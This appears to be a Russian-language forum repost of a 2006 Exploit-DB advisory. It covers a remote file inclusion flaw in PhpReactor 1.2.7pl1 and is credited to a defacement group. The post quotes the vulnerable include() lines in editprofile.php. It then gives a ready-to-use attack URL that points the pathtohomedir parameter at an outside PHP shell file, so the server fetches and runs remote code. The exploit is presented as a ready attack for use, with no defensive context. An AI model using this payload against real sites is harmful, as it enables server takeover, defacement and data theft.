Exploit PhpReactor 1.2.7pl1 - 'pathtohomedir' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2095
Проверка EDB
  1. Пройдено
Автор
CENGIZ-HAN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-3983
Дата публикации
2006-07-31
Код:
###########################    www.system-defacers.org         ###############
#    Found By CeNGiZ-HaN [email protected]
#    phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability
############################################################################
#    Vulnerable Code in editprofile.php
#      //INCLUDE DB FUNCTIONS
#   if(!defined("REACTOR_INC_DB")) { include($pathtohomedir."/inc/db.inc.php"); }
#   //INCLUDE LANGUAGE FUNCTIONS
#   if(!defined("REACTOR_INC_LANG")) { include($pathtohomedir."/inc/lang.inc.php"); }
#   //INCLUDE USERS FUNCTIONS
#   if(!defined("REACTOR_INC_USERS")) { include($pathtohomedir."/inc/users.inc.php"); }
#   //INCLUDE BBS FUNCTIONS
#   if(!defined("REACTOR_INC_BBS")) { include($pathtohomedir."/inc/bbs.inc.php"); }
#
#
#              http://[target]/[path]/editprofile.php?pathtohomedir=http://phpshell.txt?
#
##############################################################################
#
#        W W W . S Y S T E M - D E F A C E R S . O R G
#
##############################################################################

# milw0rm.com [2006-07-31]
 
Источник
www.exploit-db.com